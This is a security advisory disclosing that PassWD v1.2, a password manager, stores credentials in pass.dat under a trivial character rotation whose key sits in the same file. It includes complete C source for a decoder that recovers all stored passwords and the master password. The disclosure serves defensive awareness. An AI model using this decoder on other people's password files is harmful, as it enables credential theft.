COMMAND
PassWD
SYSTEMS AFFECTED
PassWD v1.2
PROBLEM
Daniel Roethlisberger found following. PassWD is a password
managment software designed to store all the users user and
password combinations along with a site URL. Due to the fact
that PassWD is being spread by well-known free/shareware distro
sites such as tucows.com, the community should be aware that it
is very insecure.
The documentation claims that PassWD employs encryption. In fact
it uses a very weak coding that can easily be decoded. If an
attacker can get hold of the password file (usually this will be
pass.dat in PassWD's directory, which can be found in the
Registry), he can easily decode the file and thus retrieve the
user/password combinations along with the matching links, and the
master password used to `protect' the password list. Also this is
very easily exploitable by malware like password gathering
trojans.
PassWD stores all the sensitive data in a file usually called
pass.dat (this can be changed in PassWD's INI file).
Unfortunately, it not only employs a very weak encoding algorithm,
but it also hides the key in the same file. This key is purely
random, and is in no way dependant on the master password.
The key can take a value between 1 and 99, which shows the extreme
weakness of the system. The charset consisting of 99 characters
is simply rotated by <key> positions.
The below source code illustrates this. It can be used to decode
any given PassWD v1.2 `pass.dat' file to either stdout or an
output file.
/*
* Decoder for PassWD v1.2 `pass.dat' password files
*
* Written 2000 by Daniel Roethlisberger <admin@roe.ch>
*
* This code is hereby placed in the public domain.
* Use this code at your own risk for whatever you want.
*
* The decoded data is not parsed in any way - it should
* be very easy to moderately experienced programmers
* to add that themselves.
*
*/
#include <stdio.h>
void main(int argc, char *argv[])
{
unsigned char charpos;
FILE* outfile;
FILE* infile;
unsigned char a;
unsigned char b;
unsigned char key;
unsigned char x;
unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSPUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";
printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");
if((argc > 3) || (argc < 2))
{
printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
printf("If <outfile> is omitted, the output is dumped to stdout.\n", argv[0]);
return;
}
infile = fopen(argv[1], "r");
if(infile == NULL)
{
printf("Could not open file %s\n", argv[1]);
return;
}
if(argc == 2)
outfile = stdout;
else
{
outfile = fopen(argv[2], "w");
if(outfile == NULL)
{
printf("Could not write to file %s\n", argv[2]);
_fcloseall();
return;
}
}
getc(infile); /* jump over decoy byte */
a = getc(infile); /* read encoded key byte 1 */
b = getc(infile); /* read encoded key byte 2 */
if(b == EOF)
{
printf("ERROR - encountered EOF within header\n");
return;
}
/* this line `decodes' the key */
key = (unsigned char)((a - 'b') * 10 + (b - 'b'));
/* read through infile and dump decoded output to outfile: */
x = getc(infile);
while(!feof(infile))
{
for(charpos = 0; x != charset[charpos]; charpos++)
{
if(charpos > 99)
{
printf("\nERROR - encountered illegal character in source file\n");
_fcloseall();
return;
}
}
/* plain = cypher - key */
putc(charset[charpos + 99 - key], outfile);
x = getc(infile);
}
if(argc == 2)
printf("\n\n");
printf("Done.\n");
_fcloseall();
return;
}
SOLUTION
The author of PassWD is informed. He is informing registered
users of PassWD and any distribution sites offering PassWD v1.2
for download. The author is not developing PassWD v1.2 anymore.
There will be no patch or update available. Instead there is a
successing product called PassWD 2000, which will be released
shortly. The author claims that it will employ a better (real)
encryption algorithm.
One possible workaround is to install PassWD on an encrypted hard
disk (eg. using PGPdisk or ScramDisk).